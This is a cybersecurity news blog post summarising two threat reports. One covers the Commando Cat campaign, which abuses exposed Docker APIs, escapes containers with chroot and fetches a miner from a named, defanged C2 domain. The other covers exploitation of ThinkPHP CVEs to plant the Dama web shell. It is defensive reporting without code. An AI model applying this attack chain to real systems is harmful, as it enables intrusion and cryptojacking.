Commando Cat Cryptojacking Attacks Aiming Misconfigured Docker Instances as Prime Targets
Commando Cat Cryptojacking Attacks Aiming Misconfigured Docker Instances as Prime Targets
A continuous cryptojacking attack campaign has been attributed to the threat actor known as Commando Cat. This attack campaign makes use of Docker instances that have inadequate security in order to run Bitcoin miners for the purpose of generating financial benefit..
“The intruders utilized the cmd.cat/chattr docker image container that obtains the payload from their own command-and-control (C&C) infrastructure,” researchers who work for Trend Micro Sunil Bharti and Shubham Singh said in an investigation that was published on Thursday.
At the beginning of this year, Cado Security was the first to document Commando Cat, which became known as Commando Cat due to its utilization of the open-source Commando project in order to generate a harmless container.
In order to deploy a Docker image with the name cmd.cat/chattr, which is subsequently used as a basis to instantiate a container and break out of its limits using the chroot command, the attacks are characterized by the targeting of misconfigured Docker remote API servers. This allows the attackers to get access to the host operating system.
The final stage involves getting the malicious miner software from a command and control server (also known as “leetdbs.anondns[.]net/z”) by way of a shell script. This can be accomplished by using either the curl or wget command. The program is thought to be ZiggyStarTux, which is an open-source Internet Relay Chat bot that is based on the Kaiten virus, also known as Tsunami.
“The importance of this attack campaign lies in the utilization of Docker images to deploy cryptojacking scripts on compromised systems,” according to the investigation team. “This technique enables intruders to exploit flaws in Docker configurations while avoiding discovery by security software.”
The disclosure comes at the same time that Akamai disclosed that security flaws in ThinkPHP applications that have been around for years (such as CVE-2018-20062 and CVE-2019-9082) are being exploited by a threat actor who is believed to speak Chinese in order to deliver a web shell that has been given the name Dama as part of a campaign that has been going on since October 17, 2023.
“The attack strives to obtain additional obfuscated code from another compromised ThinkPHP server in order to gain an initial foothold,” experts who work for Akamai Ron Mankivsky and Maxim Zavodchik explained. “After successfully attacking the system, the hackers will install a Chinese language web shell named Dama to maintain persistent access to the server.”
The web shell is equipped with a number of advanced capabilities that allow it to collect system data, upload files, scan network ports, escalate privileges, and navigate the file system. The latter capability enables threat actors to perform operations such as editing files, deleting files, and modifying timestamps for the purpose of obfuscation.
“The latest assaults initiated by a Chinese-speaking attacker demonstrate a continuing pattern of adversaries utilizing a fully-fledged web shell, intended for advanced victim control,” according to the study authors. “Interestingly, not all targeted customers were using ThinkPHP, which suggests that the attackers may be indiscriminately targeting a broad range of systems.”
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he’s also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the field of content in an unusual way. He began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He also combines this interest with a love of narrative, which makes him a good writer in the cybersecurity field. In the bottom line, he frequently writes for Craw Security.
READ MORE ARTICLE HERE